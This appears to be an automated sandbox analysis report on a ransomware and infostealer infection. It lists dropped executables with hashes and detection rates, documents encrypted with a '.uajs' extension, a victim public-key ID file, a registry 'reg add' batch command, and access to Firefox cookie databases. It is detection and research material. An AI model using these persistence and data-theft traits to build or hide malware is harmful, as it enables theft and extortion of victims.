SHA-512:	E6158FA8BE4702E1A20691CCB7F929A11932E2957930F93EA9D45D6E3D7CBB29D1539032B881DDEAAD22CACF2ACA68184399230847BF21F0AE7A8D6A2DB107AB
Malicious:	false
Preview:	{"public_key":"-----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA0JdwbRk0DEQ\/NHH1YmP8\\nqYfdbOSP4pL2Nw0t2u0LjS5vA0Ic\/q\/F\/FJg9ohGtzqn5bERxjtjicx8P2K1VCb4\\nygs118+zmBMi2ON1m\/aWrhgfEzPfmtTTNSW9Fwe0WingA7zMuQR6a1ic7Neeqfm+\\nORZZJ1ZbQWu8gJg\/TcLPKz6AQI5OG3AIs9RlE73h4KoDgAzPbIk\/eZ7pyhAlnLb1\\nFwWI8khAu5orm5kJzitWEvrv8Tycm36e2N78us3bl+v+DfCPILrkz+dKrQxQjqSN\\n6XuTp74OZX9hE6EfJ\/BXslkxX+\/MnoO871Uhf5l8Mg\/+zf5\/YVjX8\/fk3E3XungK\\n3wIDAQAB\\n-----END PUBLIC KEY-----\\n","id":"TkVHfCIIwaAyDJuFpBEgzIZgY7IXD6C9ormRAzIf"}

C:\Users\user\AppData\Local\Temp\1601.exe

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	734208
Entropy (8bit):	7.698390549116104
Encrypted:	false
SSDEEP:	12288:tYX3deNL5bGRk2f5bKhgUAtnqfbDhbB0ij0TCAvS3l4yT5p:tYn4d56mUHVtnq9yiOhaTf
MD5:	B925392616A0AD9C3FCDE0F5BD7EF7A1
SHA1:	C0307516EDEA4D349162FACBF08464CB38836EAD
SHA-256:	4222815C695EE01A35F8AF4078BD7EDF7446823D6B108A7DF9BF9CDDC28DBC93
SHA-512:	F688FF1ACDF5E0F97978A3CA800E5F5655C0BB93B2AEA4893A4C4B841E76453F55104E59C6774C650D7043AEBD3CC89812CD157D4FF90B87590E7D6C5069031F
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...............................".......#......................'.....................Rich....................PE..L.....3d.....................l}......"............@...........................}..............................................v..<.... }..............................................................m..@...............\|............................text.............................. ..`.rdata..............................@..@.data....r......(...t..............@....rsrc........ }.....................@..@........................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\455F.exe

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	6824024
Entropy (8bit):	7.972206333236493
Encrypted:	false
SSDEEP:	196608:IzDAdubIHCIWMzkHJAYR7rn7/A29DNd4TWf/f+mnK:IzMd2mCIVzkHHf029DwWXfbK
MD5:	9E52AA572F0AFC888C098DB4C0F687FF
SHA1:	EF7C2BB222E69AD0E10C8686EB03DCBEE7933C2B
SHA-256:	4A40F9D491F09521F4B0C6076A0EB488F6D8E1CF4B67AA6569C2CCCE13556443
SHA-512:	D0991E682AE8C954721E905753B56C01F91B85313BEB9996331793C3EFA8ACC13D574EF5BA44853ECC3E05822931ED655BAD1924FA11B774A43E015F42185F62
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 92%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...i:.e.................P.......................@..........................P........h...@.........................................@..(.............h.X.... ..$....................................................0f..............................text...+O.......................... ..`.rdata...)...`......................@..@.data...8...........................@....vmp..)Y4..0......................`..`.vmp........8.....................`..`.vmp.{.Kp....V..................... ..`.vmp.{.$....0f.....................@....vmp.{...c..@f...c................. ..`.reloc..$.... ........c.............@..@.rsrc...(....@........c.............@..@........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\4DCC.bat

Download File

Process:	C:\Windows\explorer.exe
File Type:	ASCII text, with no line terminators
Category:	modified
Size (bytes):	77
Entropy (8bit):	4.90323175550411
Encrypted:	false
SSDEEP:	3:u3Pvrmwqp2YR3sGJMGP5Rg5XQiKyMhF7n:uPzmg83JMuBi67
MD5:	55CC761BF3429324E5A0095CAB002113
SHA1:	2CC1EF4542A4E92D4158AB3978425D517FAFD16D
SHA-256:	D6CCEB3C71B80403364BF142F2FA4624EE0BE36A49BAC25ED45A497CF1CE9C3A
SHA-512:	33F9F5CAD22D291077787C7DF510806E4AC31F453D288712595AF6DEBE579FABED6CDF4662E46E6FA94DE135B161E739F55CFAE05C36C87AF85ED6A6AD1C9155
Malicious:	false
Preview:	reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1

C:\Users\user\AppData\Local\Temp\C2.bat

Download File

Process:	C:\Windows\explorer.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	77
Entropy (8bit):	4.90323175550411
Encrypted:	false
SSDEEP:	3:u3Pvrmwqp2YR3sGJMGP5Rg5XQiKyMhF7n:uPzmg83JMuBi67
MD5:	55CC761BF3429324E5A0095CAB002113
SHA1:	2CC1EF4542A4E92D4158AB3978425D517FAFD16D
SHA-256:	D6CCEB3C71B80403364BF142F2FA4624EE0BE36A49BAC25ED45A497CF1CE9C3A
SHA-512:	33F9F5CAD22D291077787C7DF510806E4AC31F453D288712595AF6DEBE579FABED6CDF4662E46E6FA94DE135B161E739F55CFAE05C36C87AF85ED6A6AD1C9155
Malicious:	false
Preview:	reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1

C:\Users\user\AppData\Local\bowsakkdestx.txt

Download File

Process:	C:\Users\user\AppData\Local\Temp\1601.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	566
Entropy (8bit):	5.980175261909468
Encrypted:	false
SSDEEP:	12:YGJ68ZyQlviAceInMG7jndKEZk2TbPzLxpSPx5kboqw2:YgJwQlvi4a97jn62TbPXS5Ww2
MD5:	892068E92307E1635CD4B30625509D68
SHA1:	C6A7BB5AE63157867A8C08DCE91B43BDE2AE1B82
SHA-256:	E6132E73CC7A5E6A55890F0E4EF646881421A458D1732066767B8E0D79E90338
SHA-512:	E6158FA8BE4702E1A20691CCB7F929A11932E2957930F93EA9D45D6E3D7CBB29D1539032B881DDEAAD22CACF2ACA68184399230847BF21F0AE7A8D6A2DB107AB
Malicious:	false
Preview:	{"public_key":"-----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA0JdwbRk0DEQ\/NHH1YmP8\\nqYfdbOSP4pL2Nw0t2u0LjS5vA0Ic\/q\/F\/FJg9ohGtzqn5bERxjtjicx8P2K1VCb4\\nygs118+zmBMi2ON1m\/aWrhgfEzPfmtTTNSW9Fwe0WingA7zMuQR6a1ic7Neeqfm+\\nORZZJ1ZbQWu8gJg\/TcLPKz6AQI5OG3AIs9RlE73h4KoDgAzPbIk\/eZ7pyhAlnLb1\\nFwWI8khAu5orm5kJzitWEvrv8Tycm36e2N78us3bl+v+DfCPILrkz+dKrQxQjqSN\\n6XuTp74OZX9hE6EfJ\/BXslkxX+\/MnoO871Uhf5l8Mg\/+zf5\/YVjX8\/fk3E3XungK\\n3wIDAQAB\\n-----END PUBLIC KEY-----\\n","id":"TkVHfCIIwaAyDJuFpBEgzIZgY7IXD6C9ormRAzIf"}

C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe

Download File

Process:	C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build3.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	306688
Entropy (8bit):	6.7250330334577075
Encrypted:	false
SSDEEP:	6144:2neDcgRQv5VaNT9DW7a6dtM9VstSttuvqIT:2O0v5VuT9DW7hdt9tKt2qI
MD5:	41B883A061C95E9B9CB17D4CA50DE770
SHA1:	1DAF96EC21D53D9A4699CEA9B4DB08CDA6FBB5AD
SHA-256:	FEF2C8CA07C500E416FD7700A381C39899EE26CE1119F62E7C65CF922CE8B408
SHA-512:	CDD1BB3A36182575CD715A52815765161EEAA3849E72C1C2A9A4E84CC43AF9F8EC4997E642702BB3DE41F162D2E8FD8717F6F8302BBA5306821EE4D155626319
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 87%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6..kr.h8r.h8r.h8...8s.h8l..8n.h8l..8..h8U_.8{.h8r.i8.h8l..82.h8l..8s.h8l..8s.h8Richr.h8........................PE..L.....a.................j....;..... .............@...........................>.............................................lh..d.....>../..........................................................0...@............................................text...rh.......j.................. ..`.data.....:..........n..............@....kic..........>......\|..............@....rsrc..../....>..0...~..............@..@................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\cookies.sqlite-shm

Download File

Process:	C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\places.sqlite-shm

Download File

Process:	C:\Users\user\AppData\Local\58293c40-b4eb-4d48-99f9-f2340d9a4ff6\build2.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\fcbhtea

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	296960
Entropy (8bit):	5.192110170113443
Encrypted:	false
SSDEEP:	3072:UftVMmPJYH+9YwY3ltaFyz3fsA23+tqB+tad0xEVKZ6OKKs6vg33qN:U3dRYH+9YqFc3kA23+QwtwyEcNPg33q
MD5:	E478A6638150036E4009BEB1530187BB
SHA1:	6C49C874BA692A84F8EBD46C2CDAB07ACA026CE4
SHA-256:	A78B39DE8C05456E93A88136F9CAAEE35E9B5149ACF072ACD3214B28293C7910
SHA-512:	35C7B708DC696C20510D4C978D0A5591EC9DC4953C0DFFB2B02E9E033DC8D4D9BC65B9D900DAAA8550EDE92A6DFC344F4DA4F4460FEBCAABC69D06ADD70CFB36
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 39%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........F.(...(...(.....(.....(.....(.....(...)..(.....(.....(.....(.Rich..(.................PE..L....FFc......................v......"............@.......................... w.....,I......................................4...<.....u..P..............................................................................t............................text.............................. ..`.rdata..............................@..@.data...h&s.........................@....rsrc....P....u..R...6..............@..@........................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\fcbhtea:Zone.Identifier

Download File

Process:	C:\Windows\explorer.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\Desktop\DUUDTUBZFW.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\1601.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.859030523319066
Encrypted:	false
SSDEEP:	24:jXBct9gDZ/Yj3WzZkrreRfGvAVC/mALVkMxs0INHpsl+x4KSFEv0IqsPzQIw1bD:jXgQlAWzNXVC/mirxsDNeYu9IqAz5yD
MD5:	B6E47CBEE3949A06F80633A805C6CF1B
SHA1:	31374D33EEBEB0D24F1420DCB4458DCFBE245DCA
SHA-256:	284D8CAC2214970B5C35F0658662FA53B5E2730FA9EA67D4F654E37961C6D3E2
SHA-512:	CB6B7BF5E4119B451590CDEA9D63B9E2F6E58D737627684A746562C91CD149DF78907A2BCC34494F5B0AFA45CCFCC585C38838736DE73FEFFF3A5E94D2AA3193
Malicious:	false
Preview:	DUUDT.L..../..<4..ys.....w...J..T.....>.J...!.].Pm.U....\(...0qCz..c\<k.._1....E{;`%....\|.V.{.. ..~gP.2z...Zw.t.0..Ank.....O...Z.m.......ht.?h..T...v.Gb...&I.9.....O......,..W^.C.`..\|.#.)2...........H.....L...........Z\|6.n.'..yw!..@k.Q.......(X;b.b]..y>.....7n...fv....H(.4q..G.A..%.. I;.m.%c..A..o.......O"~...s.....^..L..e\|..#.Y.N.]b{..).a...-}..vo..8.....9.i5...U......sEi.n.\|..a.{1.D.um...4..Ll....sM._3.T.....\a.1.\.8..\|_Z6.e1.e.{!E}qe:K.H..........l.g-.."......:..".$.x/),Ps....!.GY....x)Qo..<....W.MfV..>..q.I..)$.X....K;....LO./....VwV.......T...... ..Pc....Yb.@p..X.%..N......w....=.`gk.~........E..-.....8..u.=cZ..B....h#....2.RP..9.)).H9 ...?C-"...&8..-r...fE.P.'Uj........f......P.,6.....k....U.i......q9.....\|.]fc.nU.K.IU...}\I.....R.s...B.V`v?a.l.'o.{..4....Y....\.@:......Kc..M......"..Cw...#a...z.....n!.'.3.9"...4.Vg.MtB(k.q..s..d....8.!Rz..].....Dx.dL..N..0.~$.&h..nE...3.jf...._8&.C..8I.b.O5.7...\.'Q...(.6.\|C.....S...{[..d.

C:\Users\user\Desktop\DUUDTUBZFW.xlsx.uajs (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\1601.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.859030523319066
Encrypted:	false
SSDEEP:	24:jXBct9gDZ/Yj3WzZkrreRfGvAVC/mALVkMxs0INHpsl+x4KSFEv0IqsPzQIw1bD:jXgQlAWzNXVC/mirxsDNeYu9IqAz5yD
MD5:	B6E47CBEE3949A06F80633A805C6CF1B
SHA1:	31374D33EEBEB0D24F1420DCB4458DCFBE245DCA
SHA-256:	284D8CAC2214970B5C35F0658662FA53B5E2730FA9EA67D4F654E37961C6D3E2
SHA-512:	CB6B7BF5E4119B451590CDEA9D63B9E2F6E58D737627684A746562C91CD149DF78907A2BCC34494F5B0AFA45CCFCC585C38838736DE73FEFFF3A5E94D2AA3193
Malicious:	false
Preview:	DUUDT.L..../..<4..ys.....w...J..T.....>.J...!.].Pm.U....\(...0qCz..c\<k.._1....E{;`%....\|.V.{.. ..~gP.2z...Zw.t.0..Ank.....O...Z.m.......ht.?h..T...v.Gb...&I.9.....O......,..W^.C.`..\|.#.)2...........H.....L...........Z\|6.n.'..yw!..@k.Q.......(X;b.b]..y>.....7n...fv....H(.4q..G.A..%.. I;.m.%c..A..o.......O"~...s.....^..L..e\|..#.Y.N.]b{..).a...-}..vo..8.....9.i5...U......sEi.n.\|..a.{1.D.um...4..Ll....sM._3.T.....\a.1.\.8..\|_Z6.e1.e.{!E}qe:K.H..........l.g-.."......:..".$.x/),Ps....!.GY....x)Qo..<....W.MfV..>..q.I..)$.X....K;....LO./....VwV.......T...... ..Pc....Yb.@p..X.%..N......w....=.`gk.~........E..-.....8..u.=cZ..B....h#....2.RP..9.)).H9 ...?C-"...&8..-r...fE.P.'Uj........f......P.,6.....k....U.i......q9.....\|.]fc.nU.K.IU...}\I.....R.s...B.V`v?a.l.'o.{..4....Y....\.@:......Kc..M......"..Cw...#a...z.....n!.'.3.9"...4.Vg.MtB(k.q..s..d....8.!Rz..].....Dx.dL..N..0.~$.&h..nE...3.jf...._8&.C..8I.b.O5.7...\.'Q...(.6.\|C.....S...{[..d.

C:\Users\user\Desktop\EIVQSAOTAQ.png

Download File

Process:	C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.851378861952979
Encrypted:	false
SSDEEP:	24:RAvf9CEDcMYHB87KjUAPCGF/zSWI4AiJArntRocKgTcwfJ9mtw1bD:GVCEDcMYhDH7F/P2TvKgRityD
MD5:	445F79EED1BFCEB04B2AD6F58CF70B19
SHA1:	4F0B4DD1393C6866594142F02B3D7786DC828806
SHA-256:	B77038D31A51A4F26249D98A484AF7233358811C70472BD3AAB9C168BF72B175
SHA-512:	A740040D7195EC58D0AFFC611284C973FCF32EE81EC93F4AECB4DF643C2451C3981CD612CF9EC5EAA9FAA5056499031218D5B5EB2BFEE5CDC64F14C0A4BDDA0C
Malicious:	false
Preview:	EIVQS...E...?:.E..l2m..,..29..9.f.;...q.....JX.E....~. .r.l.#^.@.A.e.{0@.'.%.%v.)...%o#.....0.N.j.j..]q.rl~{...6..n.X..4..k....$..1.XZ.........1...0.o........\...u.xs.&<.D.]...&........%..ma/O.^`E-.2km.n.g..[.r. qIx;..".p.Vj.8.E..[V..\|}qC<9......./.o..&t'D!.n.........`Y>b8(.@.R...b^.W....,.."..i......."p.D.rV.y..4..>..6v{..@.W...<..8cy.Ikw..8.<...i+....3...?...Bj....q.QA...L.)..q..{.'O......O..s..g....^...oK`^G}6..F!.n....=.kUZ...........R.:.........(.2...@..,..?..F...0.q_A..... .n1...KK:..iq.Ff.N.p.M.....qS...y...r...!i......q;%...5.3Z.<..,.....QE".@.wd.........)....<.Jw.s..l.w..a5...^.-.5[q.<H?#}.G.@..g.......y.....4 ..Li..65S\J.s..J..0.L.`y;.....y....,..o..5.q.1...".M....v.<p...4_0....Ea.0Q.".K.8..X.2/.A..C.F@9.eb.F..C...d......by...?c.F..w..g7p.L....c%.....0... ....._>....@....j.g..s.`~.3.z..D.1.].m..%.k.d..0gLO..=...K-Ju.j....S..,_u...........O.Li..9..l..Bu>I.5OP.W..0;..L..Q..)......!....G..5.`Ov......CY....\0.&..8,N..

C:\Users\user\Desktop\EIVQSAOTAQ.png.uajs (copy)

Download File

Process:	C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.851378861952979
Encrypted:	false
SSDEEP:	24:RAvf9CEDcMYHB87KjUAPCGF/zSWI4AiJArntRocKgTcwfJ9mtw1bD:GVCEDcMYhDH7F/P2TvKgRityD
MD5:	445F79EED1BFCEB04B2AD6F58CF70B19
SHA1:	4F0B4DD1393C6866594142F02B3D7786DC828806
SHA-256:	B77038D31A51A4F26249D98A484AF7233358811C70472BD3AAB9C168BF72B175
SHA-512:	A740040D7195EC58D0AFFC611284C973FCF32EE81EC93F4AECB4DF643C2451C3981CD612CF9EC5EAA9FAA5056499031218D5B5EB2BFEE5CDC64F14C0A4BDDA0C
Malicious:	false
Preview:	EIVQS...E...?:.E..l2m..,..29..9.f.;...q.....JX.E....~. .r.l.#^.@.A.e.{0@.'.%.%v.)...%o#.....0.N.j.j..]q.rl~{...6..n.X..4..k....$..1.XZ.........1...0.o........\...u.xs.&<.D.]...&........%..ma/O.^`E-.2km.n.g..[.r. qIx;..".p.Vj.8.E..[V..\|}qC<9......./.o..&t'D!.n.........`Y>b8(.@.R...b^.W....,.."..i......."p.D.rV.y..4..>..6v{..@.W...<..8cy.Ikw..8.<...i+....3...?...Bj....q.QA...L.)..q..{.'O......O..s..g....^...oK`^G}6..F!.n....=.kUZ...........R.:.........(.2...@..,..?..F...0.q_A..... .n1...KK:..iq.Ff.N.p.M.....qS...y...r...!i......q;%...5.3Z.<..,.....QE".@.wd.........)....<.Jw.s..l.w..a5...^.-.5[q.<H?#}.G.@..g.......y.....4 ..Li..65S\J.s..J..0.L.`y;.....y....,..o..5.q.1...".M....v.<p...4_0....Ea.0Q.".K.8..X.2/.A..C.F@9.eb.F..C...d......by...?c.F..w..g7p.L....c%.....0... ....._>....@....j.g..s.`~.3.z..D.1.].m..%.k.d..0gLO..=...K-Ju.j....S..,_u...........O.Li..9..l..Bu>I.5OP.W..0;..L..Q..)......!....G..5.`Ov......CY....\0.&..8,N..

C:\Users\user\Desktop\EIVQSAOTAQ.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\1601.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.847840140580242
Encrypted:	false
SSDEEP:	24:RCwKRMWlazDr798v6rV3vcQCEBFO5WvTz8ix1vxwkdBygKsdqytTHoYT3Bw1bD:gR6BPfV3ELQLvZx1XXA4HfT3ByD
MD5:	BFEADE669C85D53F426374A878A6A4BF
SHA1:	8ED562C62A8469A4BEE51E08F8CBF13897BA80BE
SHA-256:	D34C310857DCBC7D172580190CFF340C88238587C6133920E12C3B99032D0976
SHA-512:	3106E819433BC3A3C45F7A37C861B291DC43861EB0C2D264EF9C173FD2441F2453FD91A65A5A69A3F3733148BCA6ABAA7A8542ADD6E668E4AAFF84536695A50B
Malicious:	false
Preview:	EIVQS....,r#.".a.N.....7.0...!PX.E....HL.......o...U+.....>c.6.O..s\7..Z..l.P.W......2YiN.6.......w[.....o.v..P..q}:....j.].U...{...~......'=ob.5.2...J.j.X..,...D..g....c8/d.GvL.98gB.'.6.T...b.8./.q#....@...lu.d.e.........<.law...=G.]FT..P...NK.^..~..mR.T.'f.>...?..ob...e?..j}k.@K.G.O...Xv..\|.vE..juq.3B(J.........h n..._X.x;e^.IA...&<..2ZF.l..b...sDN.....r.e'..........E...y&L......:u..#.....0.F.Qc6.v....6..p.LE.@...L[.s6.7..7V.6hf.m)...n.,.q..;i.... ..~m.~.u...K....}S.Z.K.........P..]+..(...F..j}...B0......1.....t..Q....7..8..N....J...x..2....-..(....9........[....D.6.u+>..,.x..t....j.@..'.U.Brj.^.:QF...\...!l.IY...WL.7....W....6.]~M6e.......}..,.g.y.~q.."....yV..-....L.eIou....{...C9.3..4..`.6S.<.V..J..h..j..ZB.......y.d'.]cU....'.hRK../.'n...`4..@.SZ(...\|Z?.~i. ...".._.V........V..e.,..Mt.35....c.....BE\@..`V...z.....j..(.N^.m.)...DW.}.....s.@.Q.-.f..W.tq.`..a..]..k2NSC.........Y3k....E..+.....q.'<.B.^..\|..x.....;..\|....h;.S...@.&

C:\Users\user\Desktop\EIVQSAOTAQ.xlsx.uajs (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\1601.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.847840140580242
Encrypted:	false
SSDEEP:	24:RCwKRMWlazDr798v6rV3vcQCEBFO5WvTz8ix1vxwkdBygKsdqytTHoYT3Bw1bD:gR6BPfV3ELQLvZx1XXA4HfT3ByD
MD5:	BFEADE669C85D53F426374A878A6A4BF
SHA1:	8ED562C62A8469A4BEE51E08F8CBF13897BA80BE
SHA-256:	D34C310857DCBC7D172580190CFF340C88238587C6133920E12C3B99032D0976
SHA-512:	3106E819433BC3A3C45F7A37C861B291DC43861EB0C2D264EF9C173FD2441F2453FD91A65A5A69A3F3733148BCA6ABAA7A8542ADD6E668E4AAFF84536695A50B
Malicious:	false
Preview:	EIVQS....,r#.".a.N.....7.0...!PX.E....HL.......o...U+.....>c.6.O..s\7..Z..l.P.W......2YiN.6.......w[.....o.v..P..q}:....j.].U...{...~......'=ob.5.2...J.j.X..,...D..g....c8/d.GvL.98gB.'.6.T...b.8./.q#....@...lu.d.e.........<.law...=G.]FT..P...NK.^..~..mR.T.'f.>...?..ob...e?..j}k.@K.G.O...Xv..\|.vE..juq.3B(J.........h n..._X.x;e^.IA...&<..2ZF.l..b...sDN.....r.e'..........E...y&L......:u..#.....0.F.Qc6.v....6..p.LE.@...L[.s6.7..7V.6hf.m)...n.,.q..;i.... ..~m.~.u...K....}S.Z.K.........P..]+..(...F..j}...B0......1.....t..Q....7..8..N....J...x..2....-..(....9........[....D.6.u+>..,.x..t....j.@..'.U.Brj.^.:QF...\...!l.IY...WL.7....W....6.]~M6e.......}..,.g.y.~q.."....yV..-....L.eIou....{...C9.3..4..`.6S.<.V..J..h..j..ZB.......y.d'.]cU....'.hRK../.'n...`4..@.SZ(...\|Z?.~i. ...".._.V........V..e.,..Mt.35....c.....BE\@..`V...z.....j..(.N^.m.)...DW.}.....s.@.Q.-.f..W.tq.`..a..]..k2NSC.........Y3k....E..+.....q.'<.B.^..\|..x.....;..\|....h;.S...@.&

C:\Users\user\Desktop\EOWRVPQCCS.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\1601.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.87536089496134
Encrypted:	false
SSDEEP:	24:5MNgKTmFK/MrqW7TK8Vfzl6+Amj+8xfEcEvHHhdIT6TVJbJ7sPVUnL3w1bD:5qgKTmI/MrrK8FB6+8csh46p3QPCL3yD
MD5:	85C0FC2EA1CBB57E499FE22899F954F5
SHA1:	614E7CB3F0D3677D7741609CFEBCD0126A19DC31
SHA-256:	6B6B394B63675D871AC1FE072453A6BE67FC80A715F0AC6592E987070DD9EE5C
SHA-512:	1EE9B50886D8B61F0B52C869EFC41D5D01DB86A2450E9A271C291DBC2C571C651B7051858B8EE60B2543405ED805176A177F156D67AA035FC31FE5F1D365CDC4
Malicious:	false
Preview:	EOWRV.=.r........@P".%U..j..#........I.8?......Q.:H......x'......'.O.@.`>......!.k....@./e.h.Uc....:...n...Q...c..7JPmI....Au..Py.H..,n.N..;.Kf..N.$........s.^....Ci...{=..p..0.Vq...@8.Q..vD0.........@#Wx........hk..b..T...,g.o.}.......NSI.QP...7...=.0..<.......c.K%...X..t.=...! .........A...o.w{0..'.....?......../.X../0.T..5.U...%T.0.. q.....^..ZU.ZI..y$3gS..o...J.!..j....-.....]g.q.[..kM.D...LT.....Ir..1.z.R.J...%......O....u.].....C...>.G7..h[...!...t..B.Z.\u....yL..2x~.....4...<..\|P..,.Ice.G...@..B'.....Y:..`V.E_.....H..9...dt.Qr..../.we.....C.c~W......=,........%.Nx!...SFL...\|.Xd.......{..g.l3.@T..H..@6.Q...(.SD,:.,....rU.......2Igf.QH8...z.?...."O....V..S...^:..H....k.+....l....y....]....E.@....Mv.*..$.G.B.R&......H.m ..?Hi..q.p..;.x....g.Oo}N.......L..X.f.Pf..N..J..>.R..@.....b...mEcS.}.d8.6.r..&..!.....;..VZ.qjz.g.N..U...F..0.e..Q...G..d...!...1...+%....`.^.....eN....w.)..C.b..-......s.?....BJ../.<'....t1?..r..z.T...>.Z;E

C:\Users\user\Desktop\EOWRVPQCCS.docx.uajs (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\1601.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.87536089496134
Encrypted:	false
SSDEEP:	24:5MNgKTmFK/MrqW7TK8Vfzl6+Amj+8xfEcEvHHhdIT6TVJbJ7sPVUnL3w1bD:5qgKTmI/MrrK8FB6+8csh46p3QPCL3yD
MD5:	85C0FC2EA1CBB57E499FE22899F954F5
SHA1:	614E7CB3F0D3677D7741609CFEBCD0126A19DC31
SHA-256:	6B6B394B63675D871AC1FE072453A6BE67FC80A715F0AC6592E987070DD9EE5C
SHA-512:	1EE9B50886D8B61F0B52C869EFC41D5D01DB86A2450E9A271C291DBC2C571C651B7051858B8EE60B2543405ED805176A177F156D67AA035FC31FE5F1D365CDC4
Malicious:	false
